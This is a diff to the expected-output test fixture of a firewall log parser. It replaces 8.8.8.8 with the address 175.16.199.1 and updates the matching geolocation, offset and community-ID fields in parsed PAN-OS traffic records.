@@ -8102,12 +7898,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 33886,
+        "log.offset": 34316,
         "network.application": "dns",
         "network.bytes": 225,
         "network.community_id": [
-            "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=",
-            "1:uTxp5xDc9k43Sc1xNxNrsxzfM/I="
+            "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=",
+            "1:cTo0xm7D3/5fRCbdwwuwUxi722g="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -8124,12 +7920,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24108",
-        "panw.panos.network.nat.community_id": "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=",
+        "panw.panos.network.nat.community_id": "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091185,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8144,14 +7940,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 149,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8176,17 +7972,18 @@
         "client.nat.port": 27899,
         "client.packets": 1,
         "client.port": 48197,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 202,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8200,7 +7997,7 @@
         "event.end": "2018-11-30T16:09:15.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:15.000-02:00",
         "event.timezone": "-02:00",
@@ -8212,12 +8009,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 34335,
+        "log.offset": 34775,
         "network.application": "dns",
         "network.bytes": 273,
         "network.community_id": [
-            "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=",
-            "1:hwpLJFJeocCuki/uuS7DMUwYAcc="
+            "1:G2nWQeko18fm7LG80vVA2C3krF4=",
+            "1:HivHFd76C8fGYRMgg2/dN+qo64I="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -8234,12 +8031,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24247",
-        "panw.panos.network.nat.community_id": "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=",
+        "panw.panos.network.nat.community_id": "1:G2nWQeko18fm7LG80vVA2C3krF4=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091186,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8254,14 +8051,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 202,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8286,17 +8083,18 @@
         "client.nat.port": 52939,
         "client.packets": 1,
         "client.port": 32296,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 195,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8310,7 +8108,7 @@
         "event.end": "2018-11-30T16:09:15.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:15.000-02:00",
         "event.timezone": "-02:00",
@@ -8322,12 +8120,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 34784,
+        "log.offset": 35234,
         "network.application": "dns",
         "network.bytes": 270,
         "network.community_id": [
-            "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=",
-            "1:PL/uhiXbtv9YRtGDNEfmkWyMpEw="
+            "1:PwRRWHkgbRmPTd6QdE3JdT1K2MI=",
+            "1:skBdPMEq89/IUuq3+XIkE66uttE="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -8344,12 +8142,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24098",
-        "panw.panos.network.nat.community_id": "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=",
+        "panw.panos.network.nat.community_id": "1:skBdPMEq89/IUuq3+XIkE66uttE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091187,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8364,14 +8162,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 195,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8397,14 +8195,7 @@
         "client.packets": 1,
         "client.port": 33870,
         "destination.address": "208.83.246.20",
-        "destination.as.number": 30303,
-        "destination.as.organization.name": "Ooma, Inc.",
         "destination.bytes": 90,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.83.246.20",
         "destination.nat.ip": "208.83.246.20",
         "destination.nat.port": 123,
@@ -8432,7 +8223,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 35233,
+        "log.offset": 35693,
         "network.application": "ntp",
         "network.bytes": 180,
         "network.community_id": [
@@ -8506,17 +8297,18 @@
         "client.nat.port": 19658,
         "client.packets": 2,
         "client.port": 54659,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 192,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 2,
         "destination.port": 53,
@@ -8530,7 +8322,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -8541,12 +8333,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 35695,
+        "log.offset": 36155,
         "network.application": "dns",
         "network.bytes": 340,
         "network.community_id": [
-            "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=",
-            "1:E2LqiKHR3ZQXGMA0QsH84jNNC/0="
+            "1:ZXjKRdtLBmEkac907R8hepJQAgc=",
+            "1:x1R9iKG6gpfTr38oGDxd94TaJfw="
         ],
         "network.direction": "outbound",
         "network.packets": 4,
@@ -8563,12 +8355,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "drop-icmp",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24258",
-        "panw.panos.network.nat.community_id": "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=",
+        "panw.panos.network.nat.community_id": "1:x1R9iKG6gpfTr38oGDxd94TaJfw=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091189,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8583,14 +8375,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.196",
-            "8.8.8.8"
+            "192.168.15.196"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 192,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 2,
         "server.port": 53,
@@ -8615,17 +8407,18 @@
         "client.nat.port": 64352,
         "client.packets": 1,
         "client.port": 57446,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 208,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8639,7 +8432,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -8650,12 +8443,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 36149,
+        "log.offset": 36619,
         "network.application": "dns",
         "network.bytes": 291,
         "network.community_id": [
-            "1:uPFYX4KL/wjyCp4kt+08v7myT3w=",
-            "1:wZXxVANJq0JID3j0Sh2o/qnIa7A="
+            "1:8KNguHP76fjqnY2FMkcbeO9WBCk=",
+            "1:KACwzOgJLPdAmFb3AUQwHtScx8A="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -8672,12 +8465,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "reset-client",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24155",
-        "panw.panos.network.nat.community_id": "1:uPFYX4KL/wjyCp4kt+08v7myT3w=",
+        "panw.panos.network.nat.community_id": "1:KACwzOgJLPdAmFb3AUQwHtScx8A=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091190,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8692,14 +8485,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 208,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8724,17 +8517,18 @@
         "client.nat.port": 60126,
         "client.packets": 1,
         "client.port": 22655,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 100,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8748,7 +8542,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -8759,12 +8553,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 36605,
+        "log.offset": 37085,
         "network.application": "dns",
         "network.bytes": 184,
         "network.community_id": [
-            "1:GzSDvCcBuprowvf40RNRaGTOn+A=",
-            "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE="
+            "1:S1I23bkB/fNp16aIx8LE9+qfQMI=",
+            "1:uPSyttH6wPoIrM2ANku8B7uB8Ek="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -8781,12 +8575,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "reset-server",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24232",
-        "panw.panos.network.nat.community_id": "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=",
+        "panw.panos.network.nat.community_id": "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091191,
         "panw.panos.source.interface": "ethernet1/2",
@@ -8801,14 +8595,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 100,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -8834,16 +8628,7 @@
         "client.packets": 13,
         "client.port": 52509,
         "destination.address": "35.185.88.112",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 7237,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "35.185.88.112",
         "destination.nat.ip": "35.185.88.112",
         "destination.nat.port": 443,
@@ -8870,7 +8655,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 37061,
+        "log.offset": 37551,
         "network.application": "ssl",
         "network.bytes": 9290,
         "network.community_id": [
@@ -8944,17 +8729,18 @@
         "client.nat.port": 35748,
         "client.packets": 1,
         "client.port": 27192,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 109,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -8968,7 +8754,7 @@
         "event.end": "2018-11-30T16:09:16.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:16.000-02:00",
         "event.timezone": "-02:00",
@@ -8980,12 +8766,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 37565,
+        "log.offset": 38055,
         "network.application": "dns",
         "network.bytes": 202,
         "network.community_id": [
-            "1:9Ub1pskil4C0tLo85OJa61g1D0Q=",
-            "1:SaW9SLCHEmuQYbHgbCLPVZmIrWo="
+            "1:SqvoGARqG3vB8IQsDqwWVdoya4g=",
+            "1:zKOYj65ZfonGNEeED/C8WsAzNdo="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -9002,12 +8788,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "23960",
-        "panw.panos.network.nat.community_id": "1:9Ub1pskil4C0tLo85OJa61g1D0Q=",
+        "panw.panos.network.nat.community_id": "1:zKOYj65ZfonGNEeED/C8WsAzNdo=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091193,
         "panw.panos.source.interface": "ethernet1/2",
@@ -9022,14 +8808,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 109,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -9054,17 +8840,18 @@
         "client.nat.port": 63701,
         "client.packets": 1,
         "client.port": 30221,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 116,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
